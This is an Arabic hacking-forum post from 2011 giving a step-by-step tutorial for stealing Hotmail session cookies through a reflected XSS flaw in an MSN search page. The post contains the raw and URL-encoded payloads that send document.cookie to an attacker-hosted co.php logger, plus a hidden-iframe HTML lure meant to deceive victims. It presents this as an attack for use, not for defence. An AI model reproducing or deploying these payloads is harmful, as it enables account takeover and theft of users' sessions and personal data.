التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-10-2011, 11:27 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية DR.THMoORY
 

 

 
إحصائية العضو





DR.THMoORY غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DR.THMoORY is on a distinguished road

افتراضي شرح واسغلال ثغره الهوتميل .. وسحب الكوكيز الايميل \HACK HOTMAIL XSS


بسم الله الرحمن الرحيم..

طيب تمام اول شي نحمل ملف co.php
http://pastebin.com/mZCMRcGC
طيب نرفعه على الشل تممام
الحين نشوف الاستغلال..
كود PHP:
http://glo.msn.com/search?searchTerm="><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script> 
احنا الحين نبدل site برابط الموقع إذا كان الملف co.php على الرئيسة لو مجلد تاني نضع بعد
/patch
patch=اسم المجلد

الحين كل ماعلينا هوا تشفير الكود
راح نشفر من بعد كلمة
searchTerm=
من بعد اليساوي.. نشوف يعني مثلآ كذا
"><object data="javascript:********.location='http://www.site.com/co.php?c='.concat(escape(********.******));"></script>
طيب راح نشفر بمقاياس
http full

عن طريق برنامج coder
نفتحه ونحط الكود ونشوف..

تم تشفير الكود الحين نبلدله بدل الكود الاول..
يعني الكود الاول من بعد اليساوي راح نحط هاد الي تشفر ..
الحين نعمل صفحه بلغه HtM نشوف.. من الشل..

الحين نضع داخل الملف..

الكود
كود:
<htm>
<h4>OwEnD By DR.THMOORY </h4>

<****** id="rf" src="هنا نضع الكود الاستغلال " allowtransparency="true" style="display:none;" scrolling="auto"  frameborder="0">
مثل مانشوف اول جمله هادي خداع حتى لايشك يعني تقوله اخترقت هالموقع,,
والكود الثانيه..
نضع بعد src
كود الاستغلال الي عملنها قبل يصبح مثل كذا,,
كود PHP:
http://glo.msn.com/search?searchTerm="%22%3E%3C%6F%62%6A%65%63%74%20%64%61%74%61%3D%22%6A%61%76%61%73%63%72%69%70%74%3A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%77%77%77%2E%73%69%74%65%2E%63%6F%6D%2F%63%6F%2E%70%68%70%3F%63%3D%27%2E%63%6F%6E%63%61%74%28%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%29%3B%22%3E%3C%2F%73%63%72%69%70%74%3E 
ونعمل save
الحين ندخل على صفحه thmooryالي عملته.. تابعو..


تمام الحين تم سحب الاي بي..+ الكوكيز +نوع المتصفح ونشوف ..
نرجع على المجلد الي كنا رافعين فيه co.php وراح نلقى ملف تكست اسمو
ok.txt



انتهى الشرح اتمنى انو عجبكم
الاكواد مرفقه شان الموقع يحجبهم..




avp ,hsyghg eyvi hgi,jldg >> ,spf hg;,;d. hghdldg \HACK HOTMAIL XSS

الملفات المرفقة
نوع الملف: txt h.txt‏ (405 بايت, المشاهدات 85)
:: نصائح مهمه :: - أفحص الملف المرفق بأي برنامج مضاد للفيروسات
2- قم بمراسلة المراقب عن أي مرفق يوجد به فيروس
3- المنتدى غير مسوؤل عن مايحتويه المرفق من بيانات

التعديل الأخير تم بواسطة DR.THMoORY ; 07-10-2011 الساعة 11:29 PM.

   

رد مع اقتباس
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 06:13 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0